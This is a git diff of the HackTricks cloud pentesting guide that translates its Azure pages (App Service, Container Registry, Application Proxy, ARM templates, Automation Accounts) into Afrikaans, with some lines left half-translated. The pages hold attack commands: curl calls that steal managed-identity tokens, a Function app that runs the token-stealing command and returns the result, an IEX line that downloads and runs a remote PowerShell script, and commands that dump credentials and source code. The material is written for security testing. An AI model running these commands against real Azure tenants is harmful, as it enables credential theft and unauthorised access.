+/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/TestManagedIdentity1 \ +/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/TestManagedIdentity2 ``` - -Then the attacker needs to have **compromised somehow the VM** to steal tokens from the assigned managed identities. Check **more info in**: +Then the attacker needs to have **kompromitteer die VM** to steal tokens from the assigned managed identities. Check **meer inligting in**: {{#ref}} https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#azure-vm @@ -380,7 +354,3 @@ https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/clou According to the [**docs**](https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/compute#microsoftcompute), this permission lets you manage the OS of your resource via Windows Admin Center as an administrator. So it looks like this gives access to the WAC to control the VMs... {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-services/README.md b/src/pentesting-cloud/azure-security/az-services/README.md index 3a40a9dff..c8228d18a 100644 --- a/src/pentesting-cloud/azure-security/az-services/README.md +++ b/src/pentesting-cloud/azure-security/az-services/README.md @@ -1,29 +1,28 @@ -# Az - Services +# Az - Dienste {{#include ../../../banners/hacktricks-training.md}} -## Portals +## Portale -You can find the list of **Microsoft portals in** [**https://msportals.io/**](https://msportals.io/) +Jy kan die lys van **Microsoft portale in** [**https://msportals.io/**](https://msportals.io/) vind. -### Raw requests +### Rau versoeke #### Azure API via Powershell -Get **access_token** from **IDENTITY_HEADER** and **IDENTITY_ENDPOINT**: `system('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');`. - -Then query the Azure REST API to get the **subscription ID** and more . +Kry **access_token** van **IDENTITY_HEADER** en **IDENTITY_ENDPOINT**: `system('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');`. +Vra dan die Azure REST API om die **subskripsie ID** en meer te kry. ```powershell $Token = 'eyJ0eX..' $URI = 'https://management.azure.com/subscriptions?api-version=2020-01-01' # $URI = 'https://graph.microsoft.com/v1.0/applications' $RequestParams = @{ - Method = 'GET' - Uri = $URI - Headers = @{ - 'Authorization' = "Bearer $Token" - } +Method = 'GET' +Uri = $URI +Headers = @{ +'Authorization' = "Bearer $Token" +} } (Invoke-RestMethod @RequestParams).value @@ -31,9 +30,7 @@ $RequestParams = @{ $URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resources?api-version=2020-10-01' $URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resourceGroups//providers/Microsoft.Compute/virtualMachines/ func.HttpResponse: - logging.info('Python HTTP trigger function processed a request.') - IDENTITY_ENDPOINT = os.environ['IDENTITY_ENDPOINT'] - IDENTITY_HEADER = os.environ['IDENTITY_HEADER'] - cmd = 'curl "%s?resource=https://management.azure.com&apiversion=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER) - val = os.popen(cmd).read() - return func.HttpResponse(val, status_code=200) +logging.info('Python HTTP trigger function processed a request.') +IDENTITY_ENDPOINT = os.environ['IDENTITY_ENDPOINT'] +IDENTITY_HEADER = os.environ['IDENTITY_HEADER'] +cmd = 'curl "%s?resource=https://management.azure.com&apiversion=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER) +val = os.popen(cmd).read() +return func.HttpResponse(val, status_code=200) ``` +## Lys van Dienste -## List of Services - -**The pages of this section are ordered by Azure service. In there you will be able to find information about the service (how it works and capabilities) and also how to enumerate each service.** +**Die bladsye van hierdie afdeling is georden volgens Azure-diens. Daarin sal jy inligting oor die diens kan vind (hoe dit werk en vermoëns) en ook hoe om elke diens te enumerate.** {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-services/az-acr.md b/src/pentesting-cloud/azure-security/az-services/az-acr.md index 800b03b30..9cd7b1b70 100644 --- a/src/pentesting-cloud/azure-security/az-services/az-acr.md +++ b/src/pentesting-cloud/azure-security/az-services/az-acr.md @@ -2,14 +2,13 @@ {{#include ../../../banners/hacktricks-training.md}} -## Basic Information +## Basiese Inligting -Azure Container Registry (ACR) is a managed service provided by Microsoft Azure for **storing and managing Docker container images and other artifacts**. It offers features such as integrated developer tools, geo-replication, security measures like role-based access control and image scanning, automated builds, webhooks and triggers, and network isolation. It works with popular tools like Docker CLI and Kubernetes, and integrates well with other Azure services. +Azure Container Registry (ACR) is 'n bestuurde diens wat deur Microsoft Azure verskaf word vir **die stoor en bestuur van Docker-containerbeelde en ander artefakte**. Dit bied funksies soos geïntegreerde ontwikkelaarstoerusting, geo-replikaasie, sekuriteitsmaatreëls soos rolgebaseerde toegangbeheer en beeldskandering, geoutomatiseerde boue, webhooks en triggers, en netwerkisolasie. Dit werk saam met gewilde gereedskap soos Docker CLI en Kubernetes, en integreer goed met ander Azure-dienste. -### Enumerate - -To enumerate the service you could use the script [**Get-AzACR.ps1**](https://github.com/NetSPI/MicroBurst/blob/master/Misc/Get-AzACR.ps1): +### Enumereer +Om die diens te enumereer kan jy die skrip [**Get-AzACR.ps1**](https://github.com/NetSPI/MicroBurst/blob/master/Misc/Get-AzACR.ps1) gebruik: ```bash # List Docker images inside the registry IEX (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/NetSPI/MicroBurst/master/Misc/Get-AzACR.ps1") @@ -18,19 +17,15 @@ Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Internet Explorer\Main" -Name " Get-AzACR -username -password -registry .azurecr.io ``` - {{#tabs }} {{#tab name="az cli" }} - ```bash az acr list --output table az acr show --name MyRegistry --resource-group MyResourceGroup ``` - {{#endtab }} {{#tab name="Az Powershell" }} - ```powershell # List all ACRs in your subscription Get-AzContainerRegistry @@ -38,19 +33,12 @@ Get-AzContainerRegistry # Get a specific ACR Get-AzContainerRegistry -ResourceGroupName "MyResourceGroup" -Name "MyRegistry" ``` - {{#endtab }} {{#endtabs }} -Login & Pull from the registry - +Teken in & Trek vanaf die registrasie ```bash docker login .azurecr.io --username --password docker pull .azurecr.io/: ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-services/az-app-service.md b/src/pentesting-cloud/azure-security/az-services/az-app-service.md index d18a4d6ee..3ce6f2115 100644 --- a/src/pentesting-cloud/azure-security/az-services/az-app-service.md +++ b/src/pentesting-cloud/azure-security/az-services/az-app-service.md @@ -2,42 +2,41 @@ {{#include ../../../banners/hacktricks-training.md}} -## App Service Basic Information +## App Service Basiese Inligting -Azure App Services enables developers to **build, deploy, and scale web applications, mobile app backends, and APIs seamlessly**. It supports multiple programming languages and integrates with various Azure tools and services for enhanced functionality and management. +Azure App Services stel ontwikkelaars in staat om **webtoepassings, mobiele toepassings agtergronde en API's naatloos te bou, te ontplooi en te skaal**. Dit ondersteun verskeie programmeertale en integreer met verskeie Azure gereedskap en dienste vir verbeterde funksionaliteit en bestuur. -Each app runs inside a sandbox but isolation depends upon App Service plans +Elke toepassing loop binne 'n sandbox, maar isolasie hang af van App Service planne -- Apps in Free and Shared tiers run on shared VMs -- Apps in Standard and Premium tiers run on dedicated VMs +- Toepassings in Gratis en Gedeelde vlakke loop op gedeelde VM's +- Toepassings in Standaard en Premium vlakke loop op toegewyde VM's > [!WARNING] -> Note that **none** of those isolations **prevents** other common **web vulnerabilities** (such as file upload, or injections). And if a **management identity** is used, it could be able to **esalate privileges to them**. +> Let daarop dat **geen** van daardie isolasies **voorkom** ander algemene **web kwesbaarhede** (soos lêeroplaai, of inspuitings). En as 'n **bestuursidentiteit** gebruik word, kan dit in staat wees om **privileges na hulle te verhoog**. -### Azure Function Apps +### Azure Funksie Toepassings -Basically **Azure Function apps are a subset of Azure App Service** in the web and if you go to the web console and list all the app services or execute `az webapp list` in az cli you will be able to **see the Function apps also listed here**. +Basies **Azure Funksie toepassings is 'n substel van Azure App Service** in die web en as jy na die webkonsol gaan en al die app dienste lys of `az webapp list` in az cli uitvoer, sal jy in staat wees om **die Funksie toepassings ook hier gelys te sien**. -Actually some of the **security related features** App services use (`webapp` in the az cli), are **also used by Function apps**. +Werklik, sommige van die **veiligheidsverwante kenmerke** wat App dienste gebruik (`webapp` in die az cli), word **ook deur Funksie toepassings gebruik**. -## Basic Authentication +## Basiese Verifikasie -When creating a web app (and a Azure function usually) it's possible to indicate if you want Basic Authentication to be enabled. This basically **enables SCM and FTP** for the application so it'll be possible to deploy the application using those technologies.\ -Moreover in order to connect to them, Azure provides an **API that allows to get the username, password and URL** to connect to the SCM and FTP servers. +Wanneer 'n webtoepassing (en 'n Azure funksie gewoonlik) geskep word, is dit moontlik om aan te dui of jy wil hê Basiese Verifikasie moet geaktiveer wees. Dit stel basies **SCM en FTP** vir die toepassing in, sodat dit moontlik sal wees om die toepassing met behulp van daardie tegnologieë te ontplooi.\ +Boonop, om met hulle te verbind, bied Azure 'n **API wat toelaat om die gebruikersnaam, wagwoord en URL** te verkry om met die SCM en FTP bedieners te verbind. -- Authentication: az webapp auth show --name lol --resource-group lol_group +- Verifikasie: az webapp auth show --name lol --resource-group lol_group SSH -Always On +Altijd Aan -Debugging +Foutopsporing -### Enumeration +### Enumerasie {{#tabs }} {{#tab name="az" }} - ```bash # List webapps az webapp list @@ -101,15 +100,15 @@ az functionapp show --name --resource-group # Get details about the source of the function code az functionapp deployment source show \ - --name \ - --resource-group +--name \ +--resource-group ## If error like "This is currently not supported." ## Then, this is probalby using a container # Get more info if a container is being used az functionapp config container show \ - --name \ - --resource-group +--name \ +--resource-group # Get settings (and privesc to the sorage account) az functionapp config appsettings list --name --resource-group @@ -125,7 +124,7 @@ az functionapp config access-restriction show --name --resource-group # Get more info about a function (invoke_url_template is the URL to invoke and script_href allows to see the code) az rest --method GET \ - --url "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/sites//functions?api-version=2024-04-01" +--url "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/sites//functions?api-version=2024-04-01" # Get source code with Master Key of the function curl "?code=" @@ -135,22 +134,18 @@ curl "https://newfuncttest123.azurewebsites.net/admin/vfs/home/site/wwwroot/func # Get source code az rest --url "https://management.azure.com//resourceGroups//providers/Microsoft.Web/sites//hostruntime/admin/vfs/function_app.py?relativePath=1&api-version=2022-03-01" ``` - {{#endtab }} {{#tab name="Az Powershell" }} - ```powershell # Get App Services and Function Apps Get-AzWebApp # Get only App Services Get-AzWebApp | ?{$_.Kind -notmatch "functionapp"} ``` - {{#endtab }} -{{#tab name="az get all" }} - +{{#tab name="az kry alles" }} ```bash #!/bin/bash @@ -170,21 +165,16 @@ list_app_services=$(az appservice list --query "[].{appServiceName: name, group: # Iterate over each App Service echo "$list_app_services" | while IFS=$'\t' read -r appServiceName group; do - # Get the type of the App Service - service_type=$(az appservice show --name $appServiceName --resource-group $group --query "kind" -o tsv) +# Get the type of the App Service +service_type=$(az appservice show --name $appServiceName --resource-group $group --query "kind" -o tsv) - # Check if it is a Function App and print its name - if [ "$service_type" == "functionapp" ]; then - echo "Function App Name: $appServiceName" - fi +# Check if it is a Function App and print its name +if [ "$service_type" == "functionapp" ]; then +echo "Function App Name: $appServiceName" +fi done ``` - -{{#endtab }} -{{#endtabs }} - -#### Obtain credentials & get access to the webapp code - +#### Verkry geloofsbriewe & kry toegang tot die webapp-kode ```bash # Get connection strings that could contain credentials (with DBs for example) az webapp config connection-string list --name --resource-group @@ -202,17 +192,12 @@ git clone 'https://:@name.scm.azurewebsites.net/repo-name.gi ## In my case the username was: $nameofthewebapp and the password some random chars ## If you change the code and do a push, the app is automatically redeployed ``` - {{#ref}} ../az-privilege-escalation/az-app-services-privesc.md {{#endref}} -## References +## Verwysings - [https://learn.microsoft.com/en-in/azure/app-service/overview](https://learn.microsoft.com/en-in/azure/app-service/overview) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-services/az-application-proxy.md b/src/pentesting-cloud/azure-security/az-services/az-application-proxy.md index e0cf6a053..3a98e637e 100644 --- a/src/pentesting-cloud/azure-security/az-services/az-application-proxy.md +++ b/src/pentesting-cloud/azure-security/az-services/az-application-proxy.md @@ -2,25 +2,24 @@ {{#include ../../../banners/hacktricks-training.md}} -## Basic Information +## Basiese Inligting -[From the docs:](https://learn.microsoft.com/en-us/entra/identity/app-proxy/application-proxy) +[Uit die dokumentasie:](https://learn.microsoft.com/en-us/entra/identity/app-proxy/application-proxy) -Azure Active Directory's Application Proxy provides **secure remote access to on-premises web applications**. After a **single sign-on to Azure AD**, users can access both **cloud** and **on-premises applications** through an **external URL** or an internal application portal. +Azure Active Directory se Application Proxy bied **veilige afstandstoegang tot plaaslike webtoepassings**. Na 'n **enkele aanmelding by Azure AD**, kan gebruikers toegang verkry tot beide **cloud** en **plaaslike toepassings** deur 'n **eksterne URL** of 'n interne toepassingsportaal. -It works like this: +Dit werk soos volg:
-1. After the user has accessed the application through an endpoint, the user is directed to the **Azure AD sign-in page**. -2. After a **successful sign-in**, Azure AD sends a **token** to the user's client device. -3. The client sends the token to the **Application Proxy service**, which retrieves the user principal name (UPN) and security principal name (SPN) from the token. **Application Proxy then sends the request to the Application Proxy connector**. -4. If you have configured single sign-on, the connector performs any **additional authentication** required on behalf of the user. -5. The connector sends the request to the **on-premises application**. -6. The **response** is sent through the connector and Application Proxy service **to the user**. - -## Enumeration +1. Nadat die gebruiker toegang tot die toepassing verkry het deur 'n eindpunt, word die gebruiker na die **Azure AD aanmeldingsbladsy** gelei. +2. Na 'n **suksesvolle aanmelding**, stuur Azure AD 'n **token** na die gebruiker se kliënttoestel. +3. Die kliënt stuur die token na die **Application Proxy diens**, wat die gebruiker se hoofnaam (UPN) en sekuriteitshoofnaam (SPN) uit die token onttrek. **Application Proxy stuur dan die versoek na die Application Proxy connector**. +4. As jy enkel aanmelding gekonfigureer het, voer die connector enige **addisionele verifikasie** uit wat namens die gebruiker vereis word. +5. Die connector stuur die versoek na die **plaaslike toepassing**. +6. Die **antwoord** word deur die connector en Application Proxy diens **na die gebruiker** gestuur. +## Enumerasie ```powershell # Enumerate applications with application proxy configured Get-AzureADApplication | %{try{Get-AzureADApplicationProxyApplication -ObjectId $_.ObjectID;$_.DisplayName;$_.ObjectID}catch{}} @@ -32,13 +31,8 @@ Get-AzureADServicePrincipal -All $true | ?{$_.DisplayName -eq "Name"} # to find users and groups assigned to the application. Pass the ObjectID of the Service Principal to it Get-ApplicationProxyAssignedUsersAndGroups -ObjectId ``` - -## References +## Verwysings - [https://learn.microsoft.com/en-us/azure/active-directory/app-proxy/application-proxy](https://learn.microsoft.com/en-us/azure/active-directory/app-proxy/application-proxy) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-services/az-arm-templates.md b/src/pentesting-cloud/azure-security/az-services/az-arm-templates.md index 6fcf24ecc..76c8847a5 100644 --- a/src/pentesting-cloud/azure-security/az-services/az-arm-templates.md +++ b/src/pentesting-cloud/azure-security/az-services/az-arm-templates.md @@ -2,18 +2,17 @@ {{#include ../../../banners/hacktricks-training.md}} -## Basic Information +## Basiese Inligting -[From the docs:](https://learn.microsoft.com/en-us/azure/azure-resource-manager/templates/overview) To implement **infrastructure as code for your Azure solutions**, use Azure Resource Manager templates (ARM templates). The template is a JavaScript Object Notation (**JSON**) file that **defines** the **infrastructure** and configuration for your project. The template uses declarative syntax, which lets you state what you intend to deploy without having to write the sequence of programming commands to create it. In the template, you specify the resources to deploy and the properties for those resources. +[Uit die dokumentasie:](https://learn.microsoft.com/en-us/azure/azure-resource-manager/templates/overview) Om **infrastruktuur as kode vir jou Azure-oplossings** te implementeer, gebruik Azure Resource Manager-sjablone (ARM-sjablone). Die sjabloon is 'n JavaScript Object Notation (**JSON**) lêer wat die **infrastruktuur** en konfigurasie vir jou projek **definieer**. Die sjabloon gebruik deklaratiewe sintaksis, wat jou toelaat om te verklaar wat jy van plan is om te ontplooi sonder om die volgorde van programmeringsopdragte te skryf om dit te skep. In die sjabloon spesifiseer jy die hulpbronne om te ontplooi en die eienskappe vir daardie hulpbronne. -### History +### Geskiedenis -If you can access it, you can have **info about resources** that are not present but might be deployed in the future. Moreover, if a **parameter** containing **sensitive info** was marked as "**String**" **instead** of "**SecureString**", it will be present in **clear-text**. +As jy toegang daartoe het, kan jy **inligting oor hulpbronne** hê wat nie teenwoordig is nie, maar moontlik in die toekoms ontplooi kan word. Boonop, as 'n **parameter** wat **sensitiewe inligting** bevat, as "**String**" **in plaas van** "**SecureString**" gemerk is, sal dit in **duidelike teks** teenwoordig wees. -## Search Sensitive Info - -Users with the permissions `Microsoft.Resources/deployments/read` and `Microsoft.Resources/subscriptions/resourceGroups/read` can **read the deployment history**. +## Soek Sensitiewe Inligting +Gebruikers met die toestemmings `Microsoft.Resources/deployments/read` en `Microsoft.Resources/subscriptions/resourceGroups/read` kan **die ontplooiingsgeskiedenis lees**. ```powershell Get-AzResourceGroup Get-AzResourceGroupDeployment -ResourceGroupName @@ -23,13 +22,8 @@ Save-AzResourceGroupDeploymentTemplate -ResourceGroupName -Depl cat .json # search for hardcoded password cat | Select-String password ``` - -## References +## Verwysings - [https://app.gitbook.com/s/5uvPQhxNCPYYTqpRwsuS/\~/changes/argKsv1NUBY9l4Pd28TU/pentesting-cloud/azure-security/az-services/az-arm-templates#references](az-arm-templates.md#references) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-services/az-automation-account/README.md b/src/pentesting-cloud/azure-security/az-services/az-automation-account/README.md index 43e03e664..fea33c811 100644 --- a/src/pentesting-cloud/azure-security/az-services/az-automation-account/README.md +++ b/src/pentesting-cloud/azure-security/az-services/az-automation-account/README.md @@ -1,55 +1,54 @@ -# Az - Automation Account +# Az - Automatiseringsrekening {{#include ../../../../banners/hacktricks-training.md}} -## Basic Information +## Basiese Inligting -[From the docs:](https://learn.microsoft.com/en-us/azure/automation/overview) Azure Automation delivers a cloud-based automation, operating system updates, and configuration service that supports consistent management across your Azure and non-Azure environments. It includes process automation, configuration management, update management, shared capabilities, and heterogeneous features. +[Uit die dokumentasie:](https://learn.microsoft.com/en-us/azure/automation/overview) Azure Automatisering bied 'n wolk-gebaseerde automatisering, bedryfstelsel opdaterings, en konfigurasiediens wat konsekwente bestuur oor jou Azure en nie-Azure omgewings ondersteun. Dit sluit prosesautomatisering, konfigurasiebestuur, opdateringsbestuur, gedeelde vermoëns, en heterogene kenmerke in. -These are like "**scheduled tasks**" in Azure that will let you execute things (actions or even scripts) to **manage**, check and configure the **Azure environment**. +Hierdie is soos "**geplande take**" in Azure wat jou toelaat om dinge (aksies of selfs skripte) uit te voer om die **Azure omgewing** te **bestuur**, te kontroleer en te konfigureer. -### Run As Account +### Loop As Rekening -When **Run as Account** is used, it creates an Azure AD **application** with self-signed certificate, creates a **service principal** and assigns the **Contributor** role for the account in the **current subscription** (a lot of privileges).\ -Microsoft recommends using a **Managed Identity** for Automation Account. +Wanneer **Loop as Rekening** gebruik word, skep dit 'n Azure AD **aansoek** met 'n self-ondertekende sertifikaat, skep 'n **dienshoof** en ken die **Bydraer** rol aan die rekening in die **huidige intekening** (baie voorregte).\ +Microsoft beveel aan om 'n **Geregelde Identiteit** vir die Automatiseringsrekening te gebruik. > [!WARNING] -> This will be **removed on September 30, 2023 and changed for Managed Identities.** +> Dit sal op **30 September 2023 verwyder word en verander word na Geregelde Identiteite.** -## Runbooks & Jobs +## Loopboeke & Werk -**Runbooks** allow you to **execute arbitrary PowerShell** code. This could be **abused by an attacker** to steal the permissions of the **attached principal** (if any).\ -In the **code** of **Runbooks** you could also find **sensitive info** (such as creds). +**Loopboeke** laat jou toe om **arbitraire PowerShell** kode uit te voer. Dit kan **misbruik word deur 'n aanvaller** om die toestemmings van die **aangehegte hoof** te steel (indien enige).\ +In die **kode** van **Loopboeke** kan jy ook **sensitiewe inligting** (soos kredensiale) vind. -If you can **read** the **jobs**, do it as they **contain** the **output** of the run (potential **sensitive info**). +As jy die **werk** kan **lees**, doen dit aangesien dit die **uitset** van die uitvoering bevat (potensieel **sensitiewe inligting**). -Go to `Automation Accounts` --> `